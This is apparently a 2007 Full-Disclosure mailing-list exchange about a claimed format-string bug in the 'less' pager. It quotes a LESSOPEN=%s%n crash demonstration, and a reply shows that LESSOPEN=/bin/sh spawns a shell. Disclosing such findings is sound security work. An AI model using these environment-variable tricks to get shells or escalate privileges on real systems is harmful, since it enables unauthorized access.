[Full-disclosure] [+] Vulnerability in less version 394 and prior

[fdlist at digitaloffense.net]

$ LESSOPEN=/bin/sh less /dev/null
sh-3.2$

On Tuesday 30 October 2007, glopeda.com wrote:
> There exists a format strings bug in the less application present in
> most flavors of UNIX.  It could be leveraged for privilege escalation
> if the calling application is setuid/setgid and does not properly drop
> privileges.
>
> Meager demonstration:
> $ export LESSOPEN=%s%n
> $ less somefile
> Segmentation fault